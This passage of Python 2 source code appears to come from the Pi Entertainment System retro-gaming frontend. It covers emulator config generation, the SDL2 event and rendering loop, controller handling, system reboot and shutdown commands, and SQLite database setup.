with open(userGles2n64ConfFile, 'w') as f:
f.write(output)
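# Illustrative effect of the substitution above: a hypothetical config line
# 'window width = 640' becomes 'window width =1024' on a 1024-pixel-wide
# screen; only the number after '=' is rewritten, other lines pass through.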
elif emulator == "vice":
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
logging.debug("PESApp.playGame: creating SDL joystick mapping %s" % userViceJoystickConfFile)
with open(userViceJoystickConfFile, 'w') as f:
f.write("# THIS FILE IS AUTOMATICALLY GENERATED BY PES!\n")
f.write("!CLEAR\n")
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
f.write("# %s\n" % jsName)
# joynum inputtype inputindex action
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT, 8))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT, 4))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP, 1))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, 2))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_A, 16))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_BACK, -4))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_GUIDE, -4))
logging.info("loading game: %s" % game.getName())
game.setPlayCount()
game.setLastPlayed()
game.save()
launchString = game.getCommand()
logging.debug("PESApp.playGame: launch string: %s" % launchString)
self.runCommand(launchString)
def processCecEvent(self, btn, dur):
if dur > 0:
logging.debug("PESApp.processCecEvent: button %s" % btn)
e = mapRemoteButtonEvent(btn)
if e:
sdl2.SDL_PushEvent(e)
def reboot(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.reboot, False)
else:
logging.info("PES is rebooting...")
self.runCommand(self.config.rebootCommand)
def reload(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.reload, False)
else:
logging.info("PES is reloading...")
self.runCommand("sleep 1")
def resetConfig(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.resetConfig, False)
else:
logging.info("PES is resetting its config...")
for root, dirs, files in os.walk(userConfDir, topdown=False):
for name in files:
path = os.path.join(root, name)
logging.debug("PESApp.resetConfig: deleting file %s" % path)
os.remove(path)
for name in dirs:
path = os.path.join(root, name)
logging.debug("PESApp.resetConfig: deleting directory %s" % path)
os.rmdir(path)
self.runCommand("sleep 1")
def resetDatabase(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.resetDatabase, False)
else:
logging.info("PES is resetting its database...")
logging.debug("PESApp.resetDatabase: deleting %s" % userPesDb)
os.remove(userPesDb)
self.runCommand("sleep 1")
def run(self):
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO | sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_GAMECONTROLLER) != 0:
pesExit("Failed to inialise SDL!", True)
sdl2.SDL_ShowCursor(0)
sdl2.sdlttf.TTF_Init()
imgFlags = sdl2.sdlimage.IMG_INIT_JPG | sdl2.sdlimage.IMG_INIT_PNG
initted = sdl2.sdlimage.IMG_Init(imgFlags)
if initted != imgFlags:
pesExit("Failed to inialise SDL_Image!", True)
videoMode = sdl2.video.SDL_DisplayMode()
if sdl2.video.SDL_GetDesktopDisplayMode(0, videoMode) != 0:
pesExit("PESApp.run: unable to get current video mode!")
logging.debug("PESApp.run: video mode (%d, %d), refresh rate: %dHz" % (videoMode.w, videoMode.h, videoMode.refresh_rate))
self.__screenSize = (videoMode.w, videoMode.h)
logging.debug("Using PySDL2 %s" % sdl2.__version__)
sdl2Version = sdl2.SDL_version()
sdl2.SDL_GetVersion(sdl2Version)
logging.debug("Using SDL2 %s.%s.%s" % (sdl2Version.major, sdl2Version.minor, sdl2Version.patch))
# register PES event type
if pes.event.registerPesEventType():
logging.debug("PESApp.run: PES event type registered in SDL2: %s" % pes.event.EVENT_TYPE)
else:
logging.error("PESApp.run: could not register PES event type in SDL2!")
self.exit(1)
setLogicalSize = False
if self.__dimensions[0] == 0 or self.__dimensions[1] == 0:
# assume full screen
logging.debug("PESApp.run: running fullscreen")
if videoMode.w > self.config.desiredResolution[0] and videoMode.h > self.config.desiredResolution[1]:
self.__dimensions = (self.config.desiredResolution[0], self.config.desiredResolution[1])
setLogicalSize = True
else:
self.__dimensions = (videoMode.w, videoMode.h)
self.__window = sdl2.video.SDL_CreateWindow('PES', sdl2.video.SDL_WINDOWPOS_UNDEFINED, sdl2.video.SDL_WINDOWPOS_UNDEFINED, self.__dimensions[0], self.__dimensions[1], sdl2.video.SDL_WINDOW_FULLSCREEN_DESKTOP)
else:
# windowed
logging.debug("PESApp.run: running windowed")
self.__window = sdl2.video.SDL_CreateWindow('PES', sdl2.video.SDL_WINDOWPOS_UNDEFINED, sdl2.video.SDL_WINDOWPOS_UNDEFINED, self.__dimensions[0], self.__dimensions[1], 0)
self.menuHeight = self.__dimensions[1] - self.__footerHeight - self.__headerHeight
self.menuRect = [0, self.__headerHeight + 1, self.menuWidth, self.__dimensions[1] - self.__headerHeight + 1]
self.screenRect = [self.menuWidth + 1, self.__headerHeight + 1, self.__dimensions[0] - self.menuWidth + 1, self.__dimensions[1] - self.__headerHeight + 1]
logging.debug("PESApp.run: window dimensions: (%d, %d)" % (self.__dimensions[0], self.__dimensions[1]))
self.splashFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['splash'])
self.menuFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['menu'])
self.headerFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['header'])
self.titleFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['title'])
self.bodyFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['body'])
self.smallBodyFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['smallBody'])
self.renderer = sdl2.SDL_CreateRenderer(self.__window, -1, sdl2.render.SDL_RENDERER_ACCELERATED)
if setLogicalSize:
logging.debug("PESApp.run: setting logical resolution to: (%d, %d)" % (self.__dimensions[0], self.__dimensions[1]))
sdl2.SDL_RenderSetLogicalSize(self.renderer, self.__dimensions[0], self.__dimensions[1])
# pre-initialise screens
self.screens = {}
headerLabel = Label(self.renderer, 5, 0, "Pi Entertainment System", self.headerFont, self.textColour)
self.__uiObjects.append(headerLabel)
dateLabel = Label(self.renderer, 0, 0, "00:00:00 00/00/0000", self.headerFont, self.textColour)
dateLabel.x = self.__dimensions[0] - dateLabel.width - 5
self.__uiObjects.append(dateLabel)
splashLabel = Label(self.renderer, 0, 0, "Pi Entertainment System", self.splashFont, self.textColour)
splashLabel.x = int((self.__dimensions[0] - splashLabel.width) / 2)
splashLabel.y = ((self.__dimensions[1]) / 2) - splashLabel.height
running = True
loading = True
lastTick = sdl2.timer.SDL_GetTicks()
splashTextureAlpha = 25
progressBarWidth = splashLabel.width
progressBarHeight = 40
progressBarX = splashLabel.x
progressBarY = splashLabel.y + splashLabel.height + 20
loadingThread = PESLoadingThread(self)
progressBar = ProgressBar(self.renderer, progressBarX, progressBarY, progressBarWidth, progressBarHeight, self.lineColour, self.menuBackgroundColour)
statusLabel = Label(self.renderer, 0, 0, loadingThread.status, self.bodyFont, self.textColour)
statusLabel.x = int((self.__dimensions[0] - statusLabel.width) / 2)
statusLabel.y = progressBarY + progressBarHeight + 2
# load joystick database
sdl2.SDL_GameControllerAddMappingsFromFile(userGameControllerFile)
self.__gamepadIcon = Icon(self.renderer, dateLabel.x, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, gamepadImageFile, False)
self.__gamepadIcon.setVisible(False)
self.__remoteIcon = Icon(self.renderer, dateLabel.x, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, remoteImageFile, False)
self.__remoteIcon.setVisible(self.__cecEnabled)
self.__networkIcon = Icon(self.renderer, dateLabel.x - 42, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, networkImageFile, False)
self.ip = None
defaultInterface = getDefaultInterface()
if defaultInterface:
self.ip = getIPAddress(defaultInterface)
logging.debug("PESApp.run: default interface: %s, IP address: %s" % (defaultInterface, self.ip))
else:
logging.warning("PESApp.run: default network interface not found!")
self.__networkIcon.setVisible(False)
self.__msgBox = None
self.__controlPad = None
self.__controlPadIndex = None
self.__dpadAsAxis = False
joystickTick = sdl2.timer.SDL_GetTicks()
downTick = joystickTick
screenSaverTick = joystickTick
screenSaverActive = False
self.__screenSaverLabel = None
fpsManager = sdl2.sdlgfx.FPSManager()
sdl2.sdlgfx.SDL_initFramerate(fpsManager)
sdl2.sdlgfx.SDL_setFramerate(fpsManager, 60)
while running:
if self.__screenSaverTimeout > 0 and not screenSaverActive and sdl2.timer.SDL_GetTicks() - screenSaverTick > self.__screenSaverTimeout * 60000: # milliseconds per minute
logging.debug("PESApp.run: activating screen saver")
screenSaverActive = True
screenSaverLastTick = screenSaverTick
if self.__screenSaverLabel == None:
self.__screenSaverLabel = Label(self.renderer, 0, 0, "Pi Entertainment System", self.splashFont, self.textColour)
self.__screenSaverLabel.setCoords(random.randint(0, self.__dimensions[0] - self.__screenSaverLabel.width), random.randint(0, self.__dimensions[1] - self.__screenSaverLabel.height))
events = sdl2.ext.get_events()
for event in events:
if self.doJsToKeyEvents:
if (event.type == sdl2.SDL_CONTROLLERBUTTONDOWN or event.type == sdl2.SDL_CONTROLLERBUTTONUP) and self.__controlPad and event.cbutton.which == self.__controlPadIndex and (not self.__dpadAsAxis or (self.__dpadAsAxis and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT)):
if event.type == sdl2.SDL_CONTROLLERBUTTONDOWN:
logging.debug("PESApp.run: player 1 button \"%s\" pressed" % sdl2.SDL_GameControllerGetStringForButton(event.cbutton.button))
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
e = mapControlPadButtonEvent(event, sdl2.SDL_KEYDOWN)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_CONTROLLERBUTTONUP:
e = mapControlPadButtonEvent(event, sdl2.SDL_KEYUP)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_CONTROLLERAXISMOTION and self.__controlPad and event.caxis.which == self.__controlPadIndex:
if event.caxis.value < JOYSTICK_AXIS_MIN or event.caxis.value > JOYSTICK_AXIS_MAX:
logging.debug("PESApp.run: player 1 axis \"%s\" activated: %d" % (sdl2.SDL_GameControllerGetStringForAxis(event.caxis.axis), event.caxis.value))
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
e = mapControlPadAxisEvent(event, sdl2.SDL_KEYDOWN)
if e:
sdl2.SDL_PushEvent(e)
else:
e = mapControlPadAxisEvent(event, sdl2.SDL_KEYUP)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_JOYAXISMOTION and self.__controlPad and self.__controlPadIndex == event.jaxis.which:
if self.__dpadAsAxis:
# and so begins some really horrible code to work around the SDL2 game controller API mapping axis to dpad buttons
for b in [sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT]:
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, b)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if bind.value.axis == event.jaxis.axis:
btn = b
if event.jaxis.value < JOYSTICK_AXIS_MIN:
if b == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP
else:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT
key = mapButtonToKey(btn)
if event.jaxis.value < JOYSTICK_AXIS_MIN or event.jaxis.value > JOYSTICK_AXIS_MAX:
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
else:
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYUP
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
break
if event.type == pes.event.EVENT_TYPE:
(t, d1, d2) = pes.event.decodePesEvent(event)
logging.debug("PESApp.run: trapping PES Event")
if not loading and t == pes.event.EVENT_DB_UPDATE:
self.initSurfaces(True) # calls refresh method of all consoles
for c in self.consoles:
screenName = "Console %s" % c.getName()
if c.getGameTotal() > 0:
if screenName in self.screens:
self.screens[screenName].refresh()
else:
logging.debug("PESApp.run adding ConsoleScreen for %s following database update" % c.getName())
self.screens[screenName] = ConsoleScreen(self, self.renderer, self.menuRect, self.screenRect, c)
self.screens["Home"].refreshMenu()
Thumbnail.destroyTextures()
if screenSaverActive:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
elif not loading and t == pes.event.EVENT_ACHIEVEMENTS_UPDATE:
logging.debug("PESApp.run: achievements have been updated")
self.setUpRetroAchievementUser()
self.screens["Home"].updateRecentBadges()
#elif t == pes.event.EVENT_RESOURCES_LOADED:
# pass
if screenSaverActive:
if event.type == sdl2.SDL_KEYDOWN:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
else:
if not loading:
# keyboard events
if event.type == sdl2.SDL_KEYDOWN:
screenSaverTick = sdl2.timer.SDL_GetTicks()
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE:
logging.debug("PESApp.run: trapping backspace key event")
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.setVisible(False)
if self.screens[self.screenStack[-1]].menuActive:
# pop the screen
screenStackLen = len(self.screenStack)
logging.debug("PESApp.run: popping screen stack, current length: %d" % screenStackLen)
if screenStackLen > 1:
self.screenStack.pop()
self.setScreen(self.screenStack[-1], False)
else:
self.screens[self.screenStack[-1]].setMenuActive(True)
elif event.key.keysym.sym == sdl2.SDLK_HOME:
logging.debug("PESApp.run: trapping home key event")
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.setVisible(False)
# pop all screens and return home
if not self.screens[self.screenStack[-1]].isBusy():
while len(self.screenStack) > 1:
s = self.screenStack.pop()
self.screens[s].setMenuActive(False)
self.screens[s].processEvent(event)
self.setScreen("Home", False)
self.screens["Home"].setMenuActive(True)
self.screens["Home"].menu.setSelected(0)
self.screens["Home"].update()
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.processEvent(event)
else:
self.screens[self.screenStack[-1]].processEvent(event)
elif event.type == sdl2.SDL_KEYUP or event.type == sdl2.SDL_JOYBUTTONUP or event.type == sdl2.SDL_JOYAXISMOTION or event.type == sdl2.SDL_JOYHATMOTION:
self.screens[self.screenStack[-1]].processEvent(event)
if event.type == sdl2.SDL_KEYDOWN and event.key.keysym.sym == sdl2.SDLK_ESCAPE:
logging.debug("PESApp.run: trapping escape key event")
self.exit(confirm=True)
# joystick events
if event.type == sdl2.SDL_QUIT:
running = False
break
if loading:
sdl2.SDL_SetRenderDrawColor(self.renderer, self.backgroundColour.r, self.backgroundColour.g, self.backgroundColour.b, 255)
sdl2.SDL_RenderClear(self.renderer)
if not loadingThread.started:
loadingThread.start()
joystickTick = sdl2.timer.SDL_GetTicks()
if splashTextureAlpha < 255 and joystickTick - lastTick > 100:
splashTextureAlpha += 25
if splashTextureAlpha > 255:
splashTextureAlpha = 255
lastTick = joystickTick
splashLabel.setAlpha(splashTextureAlpha)
splashLabel.draw()
if loadingThread.done and splashTextureAlpha >= 255:
loading = False
splashLabel.destroy()
statusLabel.destroy()
self.screens["Home"].loadTextures()
else:
progressBar.setProgress(loadingThread.progress)
progressBar.draw()
if statusLabel.setText(loadingThread.status):
statusLabel.x = int((self.__dimensions[0] - statusLabel.width) / 2)
statusLabel.draw()
elif screenSaverActive:
sdl2.SDL_SetRenderDrawColor(self.renderer, 0, 0, 0, 255)
sdl2.SDL_RenderClear(self.renderer)
# x, y, text, font, colour, bgColour=None, fixedWidth=0, fixedHeight=0, autoScroll=False, bgAlpha=255
if sdl2.SDL_GetTicks() - screenSaverLastTick > 10000: # move label every 10s
logging.debug("PESApp.run: moving screen saver label")
screenSaverLastTick = sdl2.SDL_GetTicks()
self.__screenSaverLabel.setCoords(random.randint(0, self.__dimensions[0] - self.__screenSaverLabel.width), random.randint(0, self.__dimensions[1] - self.__screenSaverLabel.height))
self.__screenSaverLabel.draw()
else:
sdl2.SDL_SetRenderDrawColor(self.renderer, self.backgroundColour.r, self.backgroundColour.g, self.backgroundColour.b, 255)
sdl2.SDL_RenderClear(self.renderer)
sdl2.sdlgfx.boxRGBA(self.renderer, 0, 0, self.__dimensions[0], self.__headerHeight, self.headerBackgroundColour.r, self.headerBackgroundColour.g, self.headerBackgroundColour.b, 255) # header bg
headerLabel.draw()
self.screens[self.screenStack[-1]].draw()
now = datetime.now()
dateLabel.setText(now.strftime("%H:%M:%S %d/%m/%Y"))
dateLabel.draw()
iconX = dateLabel.x - 42
if self.__networkIcon.visible:
self.__networkIcon.x = iconX
self.__networkIcon.draw()
iconX -= 37
if self.__gamepadIcon.visible:
self.__gamepadIcon.x = iconX
self.__gamepadIcon.draw()
iconX -= 37
if self.__remoteIcon.visible:
self.__remoteIcon.x = iconX
self.__remoteIcon.draw()
sdl2.sdlgfx.rectangleRGBA(self.renderer, 0, self.__headerHeight, self.__dimensions[0], self.__headerHeight, self.lineColour.r, self.lineColour.g, self.lineColour.b, 255) # header line
if not loading:
# detect joysticks
if self.__controlPad and not sdl2.SDL_GameControllerGetAttached(self.__controlPad):
logging.debug("PESApp.run: player 1 control pad no longer attached!")
sdl2.SDL_GameControllerClose(self.__controlPad)
self.__controlPad = None
self.__controlPadIndex = None
self.__gamepadIcon.setVisible(False)
elif self.doJsToKeyEvents:
# is the user holding down a button?
# note: we only care about directional buttons
if self.__dpadAsAxis:
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN)
if bind and bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
js = sdl2.SDL_GameControllerGetJoystick(self.__controlPad)
axisValue = sdl2.SDL_JoystickGetAxis(js, bind.value.axis)
if axisValue < JOYSTICK_AXIS_MIN or axisValue > JOYSTICK_AXIS_MAX:
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN
if axisValue < JOYSTICK_AXIS_MIN:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP
key = mapButtonToKey(btn)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
else:
for b in [sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP]:
if sdl2.SDL_GameControllerGetButton(self.__controlPad, b):
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
key = mapButtonToKey(b)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
# is the user holding down an axis?
# note: at the moment we only care about the left axis in the Y plane
for a in [sdl2.SDL_CONTROLLER_AXIS_LEFTY]:
value = sdl2.SDL_GameControllerGetAxis(self.__controlPad, a)
if value < JOYSTICK_AXIS_MIN or value > JOYSTICK_AXIS_MAX:
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
key = mapAxisToKey(a, value)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
if sdl2.timer.SDL_GetTicks() - joystickTick > 1000:
tick = sdl2.timer.SDL_GetTicks()
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
#logging.debug("PESApp.run: found %d control pads" % joystickTotal)
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
close = True
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
#logging.debug("PESApp.run: %s is attached at %d" % (sdl2.SDL_GameControllerNameForIndex(i), i))
if self.__controlPad == None:
logging.debug("PESApp.run: switching player 1 to control pad #%d: %s (%s)" % (i, sdl2.SDL_GameControllerNameForIndex(i), getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(i))))
self.__controlPadIndex = i
self.__controlPad = c
self.updateControlPad(self.__controlPadIndex)
close = False
self.__gamepadIcon.setVisible(True)
if screenSaverActive:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
#print sdl2.SDL_GameControllerMapping(c)
if close:
sdl2.SDL_GameControllerClose(c)
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.draw()
sdl2.SDL_RenderPresent(self.renderer)
# limit frame rate
sdl2.sdlgfx.SDL_framerateDelay(fpsManager)
self.exit(0)
def runCommand(self, command):
logging.debug("PESApp.runCommand: about to write to: %s" % scriptFile)
logging.debug("PESApp.runCommand: command: %s" % command)
execLog = os.path.join(userLogDir, "exec.log")
with open(scriptFile, 'w') as f:
f.write("echo running %s\n" % command)
f.write("echo see %s for console output\n" % execLog)
f.write("%s &> %s\n" % (command, execLog))
f.write("exec %s %s\n" % (os.path.join(baseDir, 'bin', 'pes') , ' '.join(sys.argv[1:])))
self.exit(0)
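# Illustrative flow of runCommand above: the generated script echoes the
# command, captures its output in exec.log, then exec's bin/pes with the
# original arguments; PES exits so that (presumably) an outer wrapper shell
# picks up and runs the script before PES restarts.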
def runKodi(self):
logging.debug("PESApp.runKodi: launching kodi using: %s" % self.config.kodiCommand)
self.runCommand(self.config.kodiCommand)
def setCecEnabled(self, enabled):
self.__cecEnabled = enabled
def setScreen(self, screen, doAppend=True):
if not screen in self.screens:
logging.warning("PESApp.setScreen: invalid screen selection \"%s\"" % screen)
else:
logging.debug("PESApp.setScreen: setting current screen to \"%s\"" % screen)
logging.debug("PESApp.setScreen: adding screen \"%s\" to screen stack" % screen)
if doAppend:
self.screenStack.append(screen)
self.screens[screen].setMenuActive(True)
def setUpRetroAchievementUser(self):
if self.retroAchievementConn:
if self.achievementUser:
logging.debug("PESApp.setUpRetroAchievementUser: refreshing user object...")
self.achievementUser.refresh()
else:
logging.debug("PESApp.setUpRetroAchievementUser: setting up user object...")
# look up user in database
con = None
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT `user_id` FROM `achievements_user` WHERE `user_name` = '%s';" % self.retroAchievementConn.getUsername().replace("'", "''"))
row = cur.fetchone()
if row:
self.achievementUser = AchievementUser(userPesDb, row['user_id'])
except sqlite3.Error, e:
logging.error(e)
if con:
con.rollback()
return
finally:
if con:
con.close()
def showMessageBox(self, text, callback, *callbackArgs):
if self.__msgBox:
self.__msgBox.destroy()
self.__msgBox = MessageBox(self.renderer, text, self.bodyFont, self.textColour, self.menuBackgroundColour, self.lineColour, callback, *callbackArgs)
self.__msgBox.setVisible(True)
def shutdown(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.shutdown, False)
else:
logging.info("PES is shutting down...")
self.runCommand(self.config.shutdownCommand)
def updateControlPad(self, jsIndex):
if jsIndex == self.__controlPadIndex:
# hack for instances where a dpad is an axis
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
self.__dpadAsAxis = True
logging.debug("PESApp.run: enabling dpad as axis hack")
else:
self.__dpadAsAxis = False
class PESLoadingThread(threading.Thread):
def __init__(self, app):
super(PESLoadingThread, self).__init__()
self.app = app
self.progress = 0
self.started = False
self.done = False
self.status = "Initialising"
def run(self):
self.started = True
# create database (if needed)
con = None
logging.debug('PESLoadingThread.run: connecting to database: %s' % userPesDb)
try:
self.status = "Checking database..."
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS `games`(`game_id` INTEGER PRIMARY KEY, `thegamesdb_id` INT, `exists` INT, `console_id` INT, `name` TEXT, `cover_art` TEXT, `game_path` TEXT, `overview` TEXT, `released` INT, `last_played` INT, `added` INT, `favourite` INT(1), `play_count` INT, `size` INT, `rasum` TEXT, `achievement_api_id` INT )')
cur.execute('CREATE INDEX IF NOT EXISTS "games_index" on games (game_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `consoles`(`console_id` INTEGER PRIMARY KEY, `thegamesdb_api_id` INT, `achievement_api_id` INT, `name` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_index" on consoles (console_id ASC)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_achievement_index" on consoles (achievement_api_id ASC)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_thegamesdb_index" on consoles (thegamesdb_api_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `games_catalogue` (`short_name` TEXT, `full_name` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "games_catalogue_index" on games_catalogue (short_name ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_user`(`user_id` INTEGER PRIMARY KEY, `user_name` TEXT, `rank` INT, `total_points` INT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_user_index" on achievements_user (user_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_games`(`game_id` INTEGER PRIMARY KEY, `console_id` INT, `achievement_total` INT, `score_total` INT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_game_index" on achievements_games (game_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_badges`(`badge_id` INTEGER PRIMARY KEY, `title` TEXT, `game_id` INT, `description` TEXT, `points` INT, `badge_path` TEXT, `badge_locked_path` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_badge_index" on achievements_badges (badge_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_earned`(`user_id` INT, `badge_id` INT, `date_earned` INT, `date_earned_hardcore` INT, PRIMARY KEY (user_id, badge_id))')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_earned_index" on achievements_earned (user_id ASC, badge_id ASC)')
self.progress = 16
# is the games catalogue populated?
cur.execute('SELECT COUNT(*) AS `total` FROM `games_catalogue`')
row = cur.fetchone()
if row['total'] == 0:
self.status = "Populating games catalogue..."
logging.info("PESLoadingThread.run: populating games catalogue using file: %s" % userGamesCatalogueFile)
catalogueConfigParser = ConfigParser.ConfigParser()
catalogueConfigParser.read(userGamesCatalogueFile)
sections = catalogueConfigParser.sections()
sectionTotal = float(len(sections))
i = 0.0
insertValues = []
for section in sections:
if catalogueConfigParser.has_option(section, 'full_name'):
fullName = catalogueConfigParser.get(section, 'full_name')
#logging.debug("PESLoadingThread.run: inserting game into catalogue: %s -> %s" % (section, fullName))
#cur.execute('INSERT INTO `games_catalogue` (`short_name`, `full_name`) VALUES ("%s", "%s");' % (section, fullName))
insertValues.append('("%s", "%s")' % (section, fullName))
else:
logging.error("PESLoadingThread.run: games catalogue section \"%s\" has no \"full_name\" option!" % section)
i += 1.0
self.progress = 16 + (16 * (i / sectionTotal))
if len(insertValues) > 0:
cur.execute('INSERT INTO `games_catalogue` (`short_name`, `full_name`) VALUES %s;' % ','.join(insertValues))
con.commit()
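# Illustrative (hypothetical entries) batched statement built above:
# INSERT INTO `games_catalogue` (`short_name`, `full_name`)
# VALUES ("sf2", "Street Fighter II"), ("smb", "Super Mario Bros.");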
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
self.progress = 32
self.status = "Loading consoles..."
# load consoles
configParser = ConfigParser.ConfigParser()
configParser.read(userConsolesConfigFile)
supportedConsoles = configParser.sections()
supportedConsoleTotal = float(len(supportedConsoles))
supportedConsoles.sort()
i = 0
for c in supportedConsoles:
# check the console definition from the config file
try:
consolePath = self.app.config.romsDir + os.sep + c
mkdir(consolePath)
consoleCoverartDir = self.app.config.coverartDir + os.sep + c
mkdir(consoleCoverartDir)
extensions = configParser.get(c, 'extensions').split(' ')
command = configParser.get(c, 'command').replace('%%BASE%%', baseDir)
consoleImg = configParser.get(c, 'image').replace('%%BASE%%', baseDir)
emulator = configParser.get(c, 'emulator')
checkFile(consoleImg)
nocoverart = configParser.get(c, 'nocoverart').replace('%%BASE%%', baseDir)
checkFile(nocoverart)
thegamesdbApiId = configParser.getint(c, 'thegamesdb_id')
consoleId = None
# have we already saved this console to the database?
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('SELECT `console_id` FROM `consoles` WHERE `name` = "%s";' % c)
row = cur.fetchone()
